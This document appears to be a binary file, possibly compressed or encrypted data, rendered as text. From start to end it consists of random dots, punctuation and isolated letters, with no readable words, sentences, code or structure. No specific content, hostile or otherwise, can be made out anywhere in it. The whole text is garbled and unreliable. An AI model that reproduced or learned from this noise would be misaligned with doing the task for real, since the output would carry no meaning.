....^.\...d.....7'.$........G...^....8....f./.:........"9j}T.dH..g3......t......lc}....)WQ....kK.O...d...    ....k.7..J(j.peTk].....&.@^..`C..0...%C.D..`...#i&........Y.4........A.Q\i...*..l5..........._..@..F*.(Y9'.    _    A.......T........<.@.u......m....`...'.o....Y.|.i(...&.e.+..=_.+.<.&.w.9..D....e-.Gm.....X?.m.K.j.9_Y..........]8.....q..."J...c..a..    ...0{3.8.&H.;....Xs5..M..5.r.m...$t.........=~.z..t:.M.....m.D.{o.e....].    ...~..?....b.a.q..........P..Ni.4.......I....*.)D.Y.......,S.+.&a]E.....Z.8....pF.A...V....I.........5).......~.m.....q......\b.f.......
.puB    B3s.Y<ca.......l..;#..k.. nbP5Q.....:.1..T..S......Q$..r..    e.Z..y.x....Z.`...^.KPm1C.......-U&\....j>.R...O.L.VA.....\...N.16w-...4..q......Tv...v%.6K0.'.c..v............zo...$e@+..=......Gs7...D>n#F
..\.8
.......v.[.......e.V....z....l.....6..r....."Di..8L.e/...u-?...O ..4..a.8p>......P.e........a.?...1m..!....K.......A"iY.3.5.........p.a.O.p.:pe..Z_.{...X..{......v`.'...\hUVX.....t~J.M.KE.|..UNok.....@Lq`CA...nU8C...;.#....\tT..Mo.(QV?.Q.....T.}.\9...>o.g...a.:.etc...P.L>.v.Am)b.c.. .=[.........C-....C......h.    \.iMH...m...F.Z.X.C7...P.....*b......n}O..8Zm.f.'{./B.h.]..U..7...{9.:..U../.. ..4..p.[.....>;(..........[.#.de'.....l..
..c.3.)UC,.._+`.=U;H.^...g.l.W.8w.
..Uj.Fi...r,..n..^aU...4U..h.Y].OU4D.`e.......a#...:......*o...9..wu:=......Y.....MM.>.pI..].B.K..f...-3.....U:|..J.-b..$X.....E.../.....6...OT.Y..,.........x...p..[...-\r.(.Og...C...j.D.zr...s.r..5..\........+...a.er.....^.....>..qzs....o....Z&..e......."Ut.m.uj8Am9.1../d .NA...X..-^......5...............B...xN.......f...#(..%7..~.w    ......L6...."o.HaK....m..A'l.......M.xdn.c ...}}R...S"W.`
cK..p...[f.,?.._..Fp....5.f.G:.'.3.Pa...b..}h.B+../....gt...Z..()sKVF....0b......4....8K6...T.%..:U..y.o..z..x(.....V...M.-.On.Iw.L...|h.|..B.s(6..ss
$.....Sn...A&F.Fm)^.cF..... ..ECY..^)...&$.5._.M$F!S.......'>N.........W@J.....Q.V..    .[.)A.....JWX.[.    47{..+..L.....-.#..hB.}.3.Er...}.!B.T.b..s..n...s.w...cQ\..3.t..g..C.........Z.0...@.q.D...#[...).?m..._.....D.....f*...Nr..X{.o. [.|.{..Z....p..!...z...r....<....A...5..o.!.!.i"z..r..Iz...KpA..G...\}.<4.qt......#.k.A.x#..0}....U._.w2c.V..V?..nM.$..FEB....;.N.......u..W..5...y...}......k..C...SJ    M)..."..|h.p..0.C.r%.W.....p....U.S....~......z....ul/....).V.mPr....\.G...O......T.Y.,......?L3.uI..9.r.2..#N....E0...o^/T.9\..m |$..=e....|a ....S.......)...>.C......4A..*-.6....Q..p..7N=..v...Q...!`...?.......9..>..+....!.{a...A..E
....
.P..N.....>..d.N....y....?'..I.!2a.    .f;.Al.;..a.+m.t.a...ZtO...@..KS...m..Pa0.(&....-..7.s=.o.."Z=d.<.I.2.v8.^....~.q!....U^Mx.]......r.k?.\.    ....6......,.Z...O...[...Fo.....>..'P....;;.U.........
.u.....X}.6......X:.v...nT.m.......b._.....2..a.e&s.o.@6.c!.Z.'HH....4...Xd....u.......^...`Y....R.@.~.......&...j..@|c....rc{...0..m..5......5|.t.`.*w@..E.Lv .....z.8..j..Fv..x....m.e .>l.m..{.,.~x.Q...g"il..a.._&.J.. %.    ..}..ItX.. ..%.7.o._)..$V.`..=.......`............HM.K0F'.6k....0..ONo3C..k3..`O.P.....f.'.j.T...
..9..$[.J..uRJR..r....e......I.}\.49.....U@T{.}...#H....4...v......Z..|.......)...s..#P.u...f.....Z.....^ +{z...{.$ .er..-uk..B........3hO.T..T1..*.........W..{m]..jm...F 0....Tj...."...f
n.[.(>H....`.....L......*6bI...iH...9..Y|C.....,F^..TEH.y....LYn..UU..-.O9i..7O...ZC=....*...z.Q.....    {.B.qXl... ......!.*.....Nxn.x0i..V...`l..8.bT.....Hr..p...N..y`..0L..$..;v....3.O6...8|.|.cG.....Z.e..Y,.(.N..'.@A........(.....[._I....hl.s.ux..#.(......0...@...8..#.k_..K..xXt.I...,t.;.%.d%....J..9..!....D8.....e.9.cI=OW7B.oR....Bs.0..{..j...U.tyF...ld+...T:6..8....c...+f..@2.!.......\N0.....A.).K..n.....l...B...u./_.....*O...kH|5....g.L'......<..P...*.[.b)..g....1.....B.=..od.....=.l.B....%</9....    .&...h...3s......+.    .NS..V....0... .C*.~....4..AH....JE..R8K....5.j2...viH...+....6..z...6KYk...k.+....h}(.M....N.....H6.(.4j....WB.'OT....)-..MRl..d,o.....d.....@.&./. .Q.....6_..{.G...7#.....2.'..J..
>.S..S/..Gs.P..
.5;y.[..2.."...F$N.k...7.../O..g..|.....:L....7.v...f.......iW{..$.._Gt>2.6~....W.our.OmFDy....Y.>.g3..EY.D.Z#......7]..2.~..........x)....A^u-..0B...=C..b..u.....L......W~../~.:S..YR7..9+W.......]U...z.wv...ak.'......=ejZ.$...........<R;..S._H..[.....Av.7.,.Bh..dd...=.5...)Ghi=..7..n..:{u.m..-..........1.7.V....o......nWoV..c.....w......m.W............N.:=.i.X.a.Jb.(."6...``....JE..>1_.<H%.:o..F....Q......h...2"....!wQ.|H...Bb .tD.xM...........%9T..M).s....;.or.Pb...2..n..H2XqC..FZ..M......U1b..rqhU.........s.jM.....2...F..".v>2.e...2.M.""..H..    ....6..f...)..,....A..>....s......E.\....$.h8.........Qc.V,.....q|....7'].P..Y(..s .Q:.m#j.x............".NOy`..D.....Mg..T#.p..)u..].y....PW..9]..y....c;M.l.......?..<.....xg.h.....f    .#..    PY....;|....8C..m..+0.......(MKo0a.+....#...R.G@...~.t...$...Y"..4SV.a}.1O......g....s.f....1~:a.dM.E.....=N[8.n.W_!.....M.n.6.h7D.L2.G7V.2............A.*.-?.dX.b..K....p.6..U....dGrW......b..>`.M.jJ:.......62..>...^A.ds>u[..`.z:...;...jV.'.....w..a...x-..<I5.R......k......!.*.N...,..^+.2......a..e.H........}.V......XX...V...a.*e....iI F.}..ti.
]..E.s.E>.C.}\..$......T....DlW-`.......c...Uk.*%...3,Gu..."..^....~.{..'.>.t..x.e.{.Gu..)..-?fL.)r6Eu.5.v..G..\..EA.6.9b..*.../.....}dS.I.h..|....?.;.D...h..!E..<...)o..g".l.....=oy......l...c..m.~.].....s.5.L..G
.T6..-C.\.9...7..d4....h.U.W..p..{R.....-."....RX.[.....f..m..B..v)6C....TBoe.JP{...F..e._.N.7.}>.*W....s.9..@..j..O......I..'".....~.D.No.js....".R!...Z.F.s.~GL,.%....I.b .I.....A&uK...?~d.........9......F.. .....rE0..N.TfJT...X..
$....jM.../O.|..u;.........#..e.F.w....TT.;.w?....~.'.....!..-.v...p.<..$....Y.LZ...@.M.*..'#..X..ihi...q.._.P.........A.o$....y...W..Y_...p*....Q..T.
.[!......I.]......\.i....e...y..
q{..xF.d....:@..I.E?3.0.)o.5.>v.u...q......m..o..nx^r...+8Y.........E76.p...e..dE...]DJ.,W. .$.l3\.......C,.x.>r.z....so?^..,..1*...le......wy..}.b...N..........{.S.kU..6..........    ..;.s.....G...c^1.e...q..j.>.@{q')..v..yI7..'.Ef.e..;K.........Yq..j.k.+Y.g._.I.`(yK_.J...4.P..d1I..4....L....j.w.u.=.HD3.(....pO....D.u.XZ.....'..(..]a.........,...ke...
^.......q.!...K..K..TRP.=.k..kX..>...
B........PH..2#..9.....'9;..G..ni.WVY9.......t....6m.'-N..l    .~..jz...b.....[.3.+....don......^.'.U<.Q<..U8.......N-.n....(.B..4..[...A...._...~z....1........~K...#Oo.6.a....N...q._..P.ym..K...J.../.o..5....G@..x".H.s...... ..P.+...b....#................[$...p...4c...(.n.G3.u.
..    .6......~...q.jpC@...c..qD....K.O..    ....9^......>w..Q..B.....
..Y.p..'[.....>.{.|..T.m.?I(O.......HG..C.....+..G2N.p}..1...2........S.W............7..
..Q.....)..I..[.d.`K..>..(.~8.J....V... y".s...H.    ..8.......-.C6...\L..
>.P....1R.x.|..]....-....3.<.f...\..~.&.
..9.
.a..g.|l[I.......H.....xH.>5......].2........P.I..a..joAbr.Ok..a.. ......ju......7....p.. ..(9PO...Icr. w].2......_w..h;.w.....Q......6#w.B..wEp;O.?(.u.+..    /....-...`..}...9    ...~.,..N-.7
..+(\:..e..qn...%u....O.....Y.-..yR./*..........ho%.u.u.\.q1..?5^...Ag} ,E.+Rk.m..D.d.:f....[........'$..... 0...p.R..E.m.....mq.....F.,..o....&
^.u.._...VS.....9......~g....<..r.....:u..%a...{.....TsUg..9....t.F....7.c.....sR..V...l    ......0..W.......3m...z$...$y..cx..x2.bb/....d...T.p@j.ZL.......S..i.$.i?.....&.oO....%....I..a..
..0.E.I.|n!....Q.......l&-.l.i.JHq    .0F..$..@...I..
..(Ug.6F....($..^........o=3C...:b...{..G!
U.i;o.nx..t.[....R...2b.}....H...3..2....G..j.NL^.F.(.pE._~$%0.5;H|~.....r@.....-..    .?..A...X.._...........v-..tL..U.t.;cX.....Z.+X.T..k]J...$E...V..[.|.........e0..3..{1z.~.....C^....\(bY=3f8.... s...,.$#g..!..    ...*....p....)..=`@.?.0h.%.
P........wOv...+....`R.....y.J....N........@.2...Y...K}..z7.....n.........6.......4.......D..m..k......9.R..G=......:x.k..*......^.UI&?..;.=.[Y#N.a.
...G(.'..x....b.../.,.<...LqL.......R.bH.{t..,..Zn..+.|0....V.b.......r$..1!>....2X&..k...+."Q..
_....Y(;U...B.^Tq'Z..Nz..r...    ......P*.t..:..    ..r.6J.T.e.3.........    O..........m]$kH.SV.....E......G.w..=....Q... ....V.../...Y{...!..A...n.V..x.$.6BL#.Ks.....P...J.....k.z--..}.......(0...~p/bM|...E]w&...6...oy.....K....>9......AL}L.`...{...4.....^K.!:`}.y...;.$E..y..x.b.....qi....vY,.#]s?.....J..Pd.r.{..t.Wq-..n....\@..HTZ.....h..&...7.-...]...i.$......./T......i...ch)......z........w\..x........NC.=m......X..L11.Z"...*..
y.5v.C...7    .;Nyz....Q.............~Vow.z..?]...!..<!...bJY8......O..$...3....Y.D)...I...QAP...,..M@3..t.u..A\..8.{.q...A..}.........5.A...+L.I...L...p........Pv.hdiFkS?t..ML."4.g..?G...v.]..$..Q..HA.s...G=P.....]..2p....~>R...{..Ix7.J.\.v..(.............^.....N,9.!.R8..RU.ezG.d>.$...Qc.-.X...]..`.$S.C..7}....X.?.l.Ef.11.;...KZn.T
.l2Hd.Pl".uX.....1>+.".E...y.......<......1.....r$......~z..8.>...m.V...o..-@...!j.%.y.=.x"......p.|......).u^...GUEMGz...cR......l......    2\.{f,?.v.5v....pn..b..%u........Y.3......D.q......+@,Tv..../(R.+...4..r7bv8..XN2os.D..!6.)..~|.Ff..u..z.'.O..c.U.u...4...._^...~..E......2.r......w...z.0.w8w.......&.V.1..v..?'........C.O.c$..)...f....9'M..0.Y.&._..[.S.f.x..2'R.E...f.....).......r<.d[...b..i.-+.+X2T]V<~x..=.dr....e.......'#..1....XJu.,S.#.e...p......Rc%.......7..`. ~....C.Fzco.;.n.}....s.3..O.N!\#)....@..[... ..b..5...s.d..D.d d.....rt8...M......K..&..^yH
].}... Lu.s..g......q7.......G.].X~..fAY.. ...........y_.N.q6<.j..=c]..?.W7=....T+m..b.N.a...@..oy`j.F.....o...4...`..........0.Er...:8&.(......F.a,......J..Q*}.`~.......8.sN`.....I.9a%7...fm.cGM]...;=H..@.....<.....N..?tn.....6.:...q#s..{>Av%...U~...X_u52;..R..w....!kL2;ko......X.9.._.p.^........Z....U.%...!..,N.
K.6[x..l.|7E.8T.%7_...0.r.........../E.p.......k.. e..x....~.og<.......6..9Z.....".....,..8T.n...{s.......l....X.......#.T#.q.~-%5...}z...._..:.t7..y.+...feD...T&G...g.o.Q.aN.0.~..]..X.q8..f..b...W..d...FJk............WJ&N...d........9.../.e..x.x.<0e..C.5......tB.Y.!...../..,....c.>a.m.`..E.....w.g4...SYE.L..A.0..f5.......
9..W....HG6.y..M}B.8/..=.S"...HIp>.>....a...(....j.e..BX.2.@.M..9........wmh..2.... ... Lw...^.....x..K.@.....WDW..A/aKk...    ..,.HB..YQ^.r"....0.^..b.{.nswVQ..L.(q..I7..N..S.........m-f[*......Jb..I.4.a.x%...f(.s--G.b...XI]g..Q.5b&.\..2...;......>E!.'..%h..@@F...:.[V%Dj...k.t{.hR.jY.c.k.....o.?.{....?..ksW......p..dh..Z..r....d.Z...B.W.........&NO.E.?....r..0....
L>FV..Mo VYd..v..S..7tQ..\._.6.'...)DoxW....i.jM3....`Y......u.....P.E.hF..v.........r.....n.Hnj.....r.../..Cd.41...%...f{A..p.."....`kH... {
./..j..va.....L.0...=....|5....-...
.>._..[....)..J3n)........^.....b_.... ..&..._.p....i).....,a.N^.q.....Q%\.j...mqH.........0G.E\..O...f.`.\>.R...<.T}....m.....m.6+Q..=..P.w../*<..c.j..... M8".KcfM.......u".O>..z`....tN.?T>.O].}..OOc.    ...el.F..$......qp...X..4..&/......v.k...U..A..q...Q..=.K..e..7....,...=L.k.E.z...H0..e.9..dk....|........w@..zo.7 .%.....%T}0v.r....sT......\...5U9_.e..I....&.
(T-{......,.f3b..W.U.inF.
....c..O(..rvu......T...(..dF.^Y8.@..Jp.r+Z".y.....qU_.YG..R.....Sl...V..Y
J-.}.b......^.:....?"QF~....}:[.1....e...5...n.;^e....d...c...........r\.....uA..`....2.R.y]b.....j.....&..rK~..W..H@...ix...@%6.!(sA.6...s.h.....xS..".P._w.!.c%1.Fo1.I........../:.q7.B.....5VY;
.].....e.3X.2"d.....5.........)...B.N$g....M....&F$%M....~..$d..BF.}......./.......bd.lBf4$s.T;.l......3z...ZxkP.ZC..W.e... >!5...[.n.....$..@...p.[.....\A....^.:.............x.FU........Pk.;N.*..o_...    ..5az P3?.. ..q.$.~.XP0........L.W..VF.iP0...)+_...S...}N.p'.n=..u...!7;..2...t'......lWX....F4*.O..32.?.&.C..}...y.......;....m...U.f.o...~.FJ....mVZ..H(Gb5.I.$.... a...Te.|.'..uJG...
..:.u.......j/ `H2.......E:..
...x)2.t..}.....g......qF..VM.%r..^.T......&    .3."XFM{c.`j..a2...-uq..*..M.3...$9.k`..#+B...........g...Y%.*f L......7....|...b....H4.`.Z...|..]u....SX..u..-G.4o.A.4~..q., (.A.......q[...By.........a...g...V...L2pi.T.2V..-    ..ZU.:R.4./`i...... .../..itq...f.......6..1......
..W.A..`.w..m...>.........'.......X.z..ak".....j....@.7..r......5..G.E.q.uqM6)....,...jh..}.4.1..a.H.KtP.@}]a.U.-Vr.5y<b..3.R.q.a.....-...^.G. .n.x.,9..YU.t.....K...`u..q....<X[UU....H....i5Q\...b[..0..{...G...'rX]f.m..[s~..l.....Nk\!..xB/8&.A.).F%C..Q.B]m...M..J.(..9.R....3......0R...G......l..@GZm.{k..........?p-    .........T}M..(..5i.. ..rVV..v;5(?.....z.+...\..3.....    Y...^....)...1.............b.K.e.....5a.4........6.~.z.$f...!..|..=k.??#bm6#,.....-...gm+.a..n..K...R.....*C.6\.........w8.............$...PW.A$..T..A.SL.x...M..[...A..~.......!.v.=E/.r%G&.4.H...%...Z.C.U_B.q..7.hx+..e....V>r.[._...Y.Y....N..
.T..}..!..u.Y.........ee...4.M.    j_z...&...1....}    D.k...z..2.......W..<*%{. ...j...*.Y......R."....?.k!Fb.x........`.m.....4...l".....9.,4.S...k..G&.=..I.m..x.g...0.&...m.C.i>..y..).X5.....v.2v8...]#.%......>G.R....|.J3(.........s...4*.,t..D7........(...e*..c..{I.y}.......(...Y.".|.T...R3n..(._.....|..Y.../F...gb....GO......o.rF.....K.&..eS.m........7...9...PR`.u...l..Yz.B.dQ.g..B..8.;...=h..!8........(|R
h........p{+...KU.D..q..'.....y?YSG"vj...}9z...!.B^a..`.\...w.-...2../{.[
=..X".........wP.N..ncF    7Y..}.$.J.b;J
..u..;\t^......1..w$.....e.
n...l...h.....p...C
.s..>....S..[".+.B.nY.R....1...<.....'O.m...a[...+.:.n..t..x..Jp...h.?.m...w..3.f.p.
.XG%t..tn....P.w......l...Z{-.....45^."...    .R..Y .....a....-....DET.JS.......c.......X.n...E........m......S..r5.N.3.......*B...=...<j...........(.
.?...??0{......|L.....y.f.<.S[).......2'4+..*.Q.......p...n.g...P..!.    >.<...,...}X[..8[4...}..w.*=..rC....3~_.|-..>1.....#.v.f)    ......+...s.....[..E.u.......%./1z=.D.\.r...83.[.q.r@......#..B.!.
.O.....=p..4.]....C....    #^.....Z..K..Y.........t.Y.8l9.....V...s.0.<............4C.._.0..~....>.n
.G.......H..8...u.5.c..Y.t.I......Z.z.BYx..".
.Q..:..3N...@.-.Jp$.8x....\a,..X......r*"......M..[.:L....Y%V.y.G[mV@.g..(...";1.l.s..yc|.....r}.?..1..d y~..._.vd......./...........GJ...G.`..(V.....rc..Uh....$..X.)H.utvD.lp$."#f..t.....,.\...9...I.;0.e.... ..T..f}<....b.4@)..L[..-l............|./.n.Z,=.;;.....7#..X.....>(..d....<~.*L..[8..eR...-.HHm.7... ..Z.......'.2.x........m.../..+...../......Dq.=A.=.7.[.z.>.a...QV].8...q%........+.........W1a.....7Y..i%.O..X.5hO.-...e}..~.dY.>5:.n..I...p.t.^.......AQ...U^..h.......cH.U./...'W.Mh>:8QI    .z...j_V/...%.QF.....s.>C,.V.a.iX.UnP.....@..I.w^.....r=..Q..vLcq!..F..i..*{.....M.....K.4..&.8x..x...]t#.}K8..C...A...GE~*..S.V.v6......M.d.Y}..z....... ..N.Y.
........@.*.\.    ......?....&...;s.w.p%{.3..?..QoI..-..i.1...5...Ko....Ho.".W.[.8.6.2...OB.......Vm.$.....0!@..
   U...o{....|-...x.1..kh7./.L.!.C.u.r..l.....    .N.|.f...[.u...sQ..C....A.q?..I..uQ.>...[g7......HJ.U.'....i.p\K$......\.3.H..-...W8....b..
xG..K........uq.e..PT.......YY..../
.FY.jBY..v.2R)..Gy.g,.4,^!.x.O..S..w....V..T1i....<..3..&.y..3..F..?.3.r......9...h.Gg..#Z..=a...Sm...S.n....}KdY.).x..&G..`..'....f.7..T#p]...r.3.'w...!M...PAY.l...g..E6..."w.4.3..<j.zq...o.L........l.mG.2q .........K.&x8..L6..}4.N..S.m2..o....2...R..UP.@.....k=...H(.....
.]..8J.......l.+.......b.VZF...p.NF....@mf.l....]...........<g..:..]p....m .o....9.4T..D....5...X....e.E....4#...B2..    ..YPBXM......&......L..E\.%..;S1...q:gZ..z..i.b...+..c,.b.[*.a..k...u.....*_......AD.....o./.K.c...t...`.    3.w...q.}z..N.._..|.a,<..SW.I....e.......{L.&O(.....>.....y%h.    .uu(.....    N.9).....2.t....h7...:[.B..[..#I....../../O..6cB...c..C.......T.B..$.>..`.BRd.`...M..w..$.#:.*.6..I..N    (Lc..a...M.A..`&Ji.j.......1..[.....<Oh.=...Cq.z........}........!....y....K...k..v$A...".....t
...y..K..f.-.u.m...bM..7.....p%8..[...1....Q,#....,.|......d4R...Kq...)..F[.......N.y[..EO.$.. e....3.5..,j'.e......... TU.....gx....h..$........U|.. f....Dn.0.$..H.3....Y*..Y....&...W..8....ib..O#........`..gz.E..'..ciB._.{..G.....j.....Q.BI..sc.~<...9..t*.......E....5o.3.6Z.>....:].W....0.S......-.-..~...v.4wl?.....|p..n...._~.#!n.[.1T......QO    ...A'....]..$....'yw...vLB....=.5........t......5._.r.,m.......df...&s..5O.....,....3...DA.@.f.7....W..y..$KN..]./....J......b#a.Y.o......&.by^.J0.'t!CO.c.0.e6..."Z..0~.^\3...!.Z...{M.$....]t...../.J:.O._7,.......M.&b..#.....T....efbz..?=.3..........    .;......S_|.c...{..MCUf....iN.B.r.....a....Q....b..y.....e2....1Pn.......bm.h......-i.T..*i..Po.D.C.......E......h.7E..d...KB...c...Z%k4j.7.y...AX.....L.wZ2kl....O[L..|"9..>J...
xea|..f.>..$..k.~..K..|..d..YC*dE...&....75.v..mna.1...)~fhzt...&K.\~...H....E..B.M0U...`..\.l.~.:..4.su.7..2 .....\....e.!.m.....q..R0^...{.... ........$..E....(....U.......L9%.s    ....JVd8.<.\=..].G=..wd.k..........t.0+    
....`...\.. $~c ^.O...A    :b...K..g?ssB(....4..eA>O.ZxRG.<...?.y.Y9...m.y....X.oFkc3`...:.w....v..o..G.....+.....).\...r....B.....N.Y.7.6X.p....|.....7.....9(...T.="....-.4.|.....J.D.:....4...    [.........9.n..........VRc.".....X'?m.$.G4?...n..m....`...[.W..\.
s.~.........    r.\.}..$a.B..E.....r~....Zc.#zLF.b#S...8....../_w..mKX.!.tW.&..:.#'/.!.\I.F|.5\.g....>..r[..5d.Q.p..'../Ok. .y..t...+N.S.....#9....'....TD...........2P>7..N.....J`.....G.....c....U..=Ek..lG..:.n...y.X.Gb....:...}....J....$d..t8...m.QN..Pz3MB.$...k,D%....q.n8.
.$..GL.P"7;.po....P...8J3Q4I).g.......M..R....)4....seL<.9..|HGO...q.Dzw.(...[.4..X,.. Q....<.N.....d.v.S..$H..'.M.)a...d.^....F<ol!.m.Dlo..9#cb~....W......q........?.Z&h..3.'.n>.oks..p.l....V_.
..s.6.T.+...=. .......{..4.0...R..;......Oc.3^...AxJ...O}....$t.)5K..B...,m.+.C:(b.f.."F.z.....,.g.U..3....KG3ao......'....r.xs..m./...K.......Z...1......vy,4
n.N.T)en.d....C..h....gx...J.x............@....b.~....43..N.P.~.N...OQ.?......^.)..a..K...LH../...tv.e.$.%f..*.X8.".K.?.85J.N.:*X.b..*.*8v....w,.(.........U.<2.....Nl..u.n.......D*jy...+U"...j.I..3.....i..K...MR...f$..T.J..B..:.._.B.f&?..x..',.H.FI......P9G..+O7....<...Ar.L|.0..^.c.......c>.Y..KW..0^.yd...g.W..H...u.^F......h5[...jaun..O.%](..bRPd...J....}......d....'.$F#a.....)..........2....>...6#.....i...U..>.[<.9....((..d.yR..h*...0.D%....3)..'8)k..\601...0H.XDn.'.E:....x.R...7'I.....]R..+t..k.h...x+..K..p........fJ..... ..yH........-.2i.=d..)%..N.
.V&...@.b...p..?6.e...g...T.Q...V..J.).M......*......R....Re.&.>g/....L...sm...O....{.o.}...7[|..X.Fnn4..V..t2...G.0..Xe3...F..f..z.u(...j..D..C;....*..^H.....c.n.y..k..!v....."A4..-.m.5.....`....c...    si......>..-.:& ..v....'..LE....../.1n+s..I..&o...P..4....%...).xa.?~-A].3co..4.\......(...q.Zb......D...f.....7g.;.....Y..1oXM.mn.. ..............e.Rt.....!0...]q.....>q.^1.L..o.....X.v..r#.1F.J.)....=.....    .n.:.@...s..xbE    ...s4s..NO..qoW:p8:{....+......H..QX...:::.$'..!$...4Jc!...\..@zq*.    ......F.D@3u.qd6C..Ku.]..s.\..-k.k^>..5.4...}VJ..E..=K...../..".&./........9.....2..S.[...y(M.....y.r]..<6(Cw.......q1.e.q..*....,.v.~z..+..&wm..bL.[.."O...q.F...a.......IU.$.g.\^Ogcbfc..v..ti.C..N..q.4I.g..\'..fh*..+9.w,a...=.rn)..    [..@r0.*...$.`...C.v..m_.b...z..u.F...8.%...p..0....e,vD.G.".....d/....w.....E......H.&7...iE.O....W.rx..U..(..[@....T..%.......:.I....4..4,.|U..v^Kf..J7..k'....J..m^.....#..Jsm.x...,.[. C...@9.s.M>1.gj....xm......N..s_
T..d...+#....=M,............z.
p.(..+..%............m.....Ow).v..T.....z.O..t..v.N.G.....<..@....    !.S.e....C..j..9|L.WT.m. ....H.    i....vLp......v...P=.5:.....%b....lP?pr.b..@....`.._....6..c..E.p..*=.'.......p.*.s..L\ m.........9*.l...K.K&i.+..f.x...^6.O..h.!m...j.-..R.......
..+V;.....-[(.M..... .x......;.......9.!L-...T@X
-=0^:.0c.(M.?.d....uk..}..q:]8.......t..!..7.....p..
x......t.Z.of...eI.I.........Z.2..EF.{,..D..}N.e..i
.IMp.U.....N+ ....8..#t.|,.}w.v.n....q.a....+..n.d.y#.{o.6..D....r...O.q.:..*/...p[QL..Il}...r.C....(....z..;....Y..9.Z.....1^:]........, a#.z.D....X7An,O...i1'    _.....).7ik...N..R..%........\..0=@....f..}.<.c...3..dj...o.DM...MRFk;.C....^..9.cS.+.O..86.p.e..4?..^+./$.\.....E;J.U.W...`p.'..
{6.?^...."..7H...iz.D.O.n.u.8K.
.O.n.i..?..u.|....'.K:lC..p.\...-pn.%..`&...o._.G.iEnk,ED;.F..
...S.oq..........c.`....~.?'....2..JoJ.....v.y....E..".%L.V....{:...f...k...8Kj.=.1e.2V..I....|Ih.v`..H....D.2J.b.....6....?#..n.,..d..\.....Rj...Bn+...f.a.....C..b.....p..f..F@r
..0T.....a...qnB9...K...dn{`/    I9......d..)...h>...b.'m..n..&...3...{.Y}........yV.7..:..}.$s.=t....>...6...3........o/...n~sN.KBM.v....o.........T...J.9....@..G`.\..S......,.v.y(..Y.+..".
..R..V.....=.
f51#nC.P5.~............Fm.f..kb..3$..6...FQ....F.Q...a.S.b.....CT..Wn.Xp.....M7l..%...FGT.q.......dXC%%I$.v........F...R.{g.T..d.v...!..W..=:..S.D..'~...3.{1.Q.L...kG./...s..v.NZ.!....87...5.2..t....pk.ue.L.>.\.)!4<w....@...y'.......m....Fx        ...v..2.c4+...-.G0.|..$7..s..m .W~r.........k..0..j*l..! /.....+~..t?..y....i......{......U.Cb.b......z>:j.>....aN;=.<.....x
FI..b...V......~...g .I......-MT..6...6)o....UO.O.t..X....L..........%....C,%.._\+l....<`..v.9...g.u....9-......?8.e.....tp.x).@<../}....L`..nP...0.W.L..".A.o..f.....q...K.2...}...........(.K4F..)x.p.R..V.....m_...~).ja....uI~.....%lI.k...U?..y....Lz..I............s.\;......#.o.7.?..a.~A..IV.?$..O..&...R5..x........HO,..M..U...liu....T.D .es..r.du.3c........b.....]y..U...x
T..r......c2...f.@`!.8.Al{.".....,7...Zo....*.j.A.o..R........~...N..OV.....)./....k.C!.G*.u._..."(Z..S..G.%.X........2..#....#.........E*..........%.%.,.R\.R.._*.0.{.9Md,.z..X.f$z.Q)..O...H7}......Rm....'e:..\...h.........=....F2j..MS..4]X.j.....Q._..b,kU.U.l..6......K..&..t......kf.6&...9GJ*@.;......-.DsF......{.q...#.P.bm..o..C@..ZvP(.V~...m{.......4..OD,..R..]...A;........ggf.9.Sg..Xh.../~....%...J.k.N..dm.....G...U.E.i~}.].U..9.a...v......|h1g.\."F...u.,    .I....D3:T7..m..X?J.....E..E-.n.h....VS.a...*......Tj.%..wu&.... .!..F+.+kA.a....=.g..T.$G..U.....%...[.;F....{.29..%.In+..p7.
..<...R.S`....K..z1/#.q7.X..'[._0?.......l._|;y.)3..i..z.....<......EZa(....&.GG.f...V...oH.\0.....f..t.TK.%.G..m.^v}.u3N...kI.cYae..\"e-./&....@.'...ob..v.3M..l.Rn.....M...
..F......H{...Q.K...?..G...,...(..x.,...h....p......x.(...7.>/.....GZ.F..h..u.%........j...%....:.T...$...(..;..U..Rx.V..#...p......I..lf..5.....GB.*......TY....I.R.@~.....3..H(\._Z..8.K..,.LR........;@...*....I3;...7...r..B..}...
...aoa\)..J.[.<...2.No..@........Q1.FV.q.].....S...<..Ap..|Bip....b"~.R.q......_....fVv..s6W_...`.+.......w..9e...L.C".%QQD.|:K.?.I.V3.M?.d.5..CS..>.......]h(..Wk.=y.^2u.    ....].|-.\......5D.&P...}o.....{.|..y.u0u.Y.o..X5.....s........7..%....!...*..!.r........9.Xe..=l........WV[V....u.._N.[.......>....y....;.~./7........MXh3^..eH...).*..Cl..$.....{.j..B....].3g@....).j....d../.....p&.u......s..I70K..5\......L......uIS..6@ (.3.J....-2n..`.8...>8.-5.j...E......&
N...l:.2....{.6H..0.zs_.8......e...
w..z.....J?8C...A[j.E......]e'h...O.    ?5,..aW.sL~....#..........N........]....%........0.f.._@..I...t.4.h....S....7....9..ml.R.Ue.b]l.N..aI.....9.    ..~M....3U.+.Hqj....W........T>..s.n.W. .......0.Z.5.'..w...C..%...R.Z....vyD..M.XGV..9.......'8.A....E...I..pW.D.Si...?....z...r..6/.W..*...-.g.`...CB.....I.'NXf.V...V.;#..#&9.#jY.....r....:.O&.g.#.....M...R.'.r(.....&J.._..2H.6.K.p.../.+.^Z..p......'....9;.KRo....#..m....."......8.8.N..yk...d...(...1.....>......J...3..xa4E.H...^.........n.........X.f~..U| ...~.E?.../p
...V8....a.cE....%..P.b.".....'.(..%.[...?+.....z...04$.I...j.&....2..T.>.....Aem..BI.n..x./....M^..u(..X    k.P...u..[..x.."S.....<.    .IGB..v..."......R...[.s.....R..G;5.lm..
V..7S.-H.d..2u....Y.
$....'......~..&.#_e.....a.H..{Kv.].....a5.'N`....._h$pwf.....X".Z,..\.H....RR.V.....Q.<..~.=...b..I~J'...N.,....8i....F.|f.'.X...}...+1..V(........[................I........`..`"S.E...8..4...J._.y...E.w..#.6O.......n.w.......r..h.G...^[....v.2.u..'B..F._|.@kA...........D...i...+05yX.Pi...]udbm..P]....F.q.
.&.....d..DW(.^4..~(.........Y.w........U'.hD.. ...........).-.
.{l..h.-.$......F"..3:.SO.O....-P{i.......E`...}....\+.]...&.9....aZk...7..h...................u...O..[
.y.S&cpb?.B...2...(6.._    .j-......021........P.$...t.?.'..7.
..8.?.oY....h    .84H}..wRW.,..8..j..;.27..\...Vw.dp!.}...fp....#^qd.!...E..>....."..V....x.fd....L....}F'3...RM..>f    .h.$....
..8.......Z......S|..J........Q....Ceg..B....K.w.z..P....f)O).H.*MwoH_....;..3O..4..R
